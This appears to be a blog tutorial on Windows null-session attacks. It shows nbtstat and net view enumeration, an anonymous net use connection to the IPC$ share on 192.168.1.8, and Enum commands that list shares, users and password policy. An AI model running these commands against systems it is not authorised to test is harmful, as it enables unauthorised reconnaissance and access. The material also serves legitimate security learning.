Exploiting
Null Sessions with Windows
The
most common command to use when enumerating Windows ahares is
nbtstat.
Nbtstat
is a Windows command that can displays information about a target.
nbtstat
-A target IP
This
command will display necessary information about target.
Let's
look at the following output after executing this command on our
target.
Here
we can already see some pretty interesting information, such as the
MAC
address,
which can be used for later attacks.
Let's
break this table up a bit.
The
first line in the table tells us information about the computer.
WORKSTATION
is te name of the computer and the suffix <00> tells us it's a
workstation.
Unique
means that this computer name must only have one IP address assigned
to it.
The
next line tells us what domain the computer is in. It is part of the
OFFICE domain.
Group
just means that the group name may exist with different IP
addresses.
There
are many different kinds of suffixes, but the most intriguing one to
us, at the moment, is <20>, <20> signifies that the File
Server Service is open, which means the user has open shares.
Now
that we know the target has File Server Services open, we can now try
and find out what shares this target is hosting.
In
order to do this, we execute the following command:
net
view target IP
Let's
see what we get when we perform this against our current target.
As
we can see, this target has quite a few shared documents.
He
is sharing his Aaron:\ drive, ShareDocs, and Printer.
We
are basically trying to connect to the administrative share without
any login credential
net
use \\192.168.1.8\IPC$ "" /u:""
if
you can see this message "The command completed successfully."
command
prompt tells us that our command completed successfully.
But
what did we do exactly? We connected to the Inter-process
communication(IPC$)Administrative share from 192.168.1.8(our target)
without specifying a user, taking advantage of null sessions.
This
will only work wit IPC$.
But if
you can see this message "System error 5 has occurred. Access is
denied."
Here
we see that we tried to apply null sessions to the C$ default
administrative share.
It
returned with an Access is denied because the null session attack
will only work with the IPC$ share.
Now
that we've shown that we can exploit a null session, what do we do?
Well, we can do many different things using a tool called Enum. This
can be done with the net command, but this tool helps to automate
many of the tasks.
enum
-S 192.168.1.8
enum
-U 192.168.1.8
enum
-P 192.168.1.8
flage
-S : tells enum to look for shares.
-U
: Tells enum to search for users.
-P
: Which tells enum to determine the policy set by te administrator.
More
flag and menual.
댓글 없음:
댓글 쓰기